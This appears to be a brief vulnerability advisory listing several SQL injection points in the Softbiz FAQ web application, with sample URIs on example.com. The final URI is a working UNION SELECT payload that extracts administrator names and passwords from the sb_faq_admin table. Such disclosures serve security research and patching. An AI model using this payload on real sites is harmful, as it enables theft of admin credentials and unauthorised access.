|
Softbiz FAQ Multiple SQL Injection Vulnerabilities
No exploit is required. Sample URI have been provided: http://www.example.com/index.php?cid=[SQL] http://www.example.com/faq_qanda.php?id=[SQL] http://www.example.com/refer_friend.php?id=[SQL] http://www.example.com/print_article.php?id=[SQL] http://www.example.com/add_comment.php?id=[SQL] http:/www.example.com/faq/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin-- |
|
|
Privacy Statement |
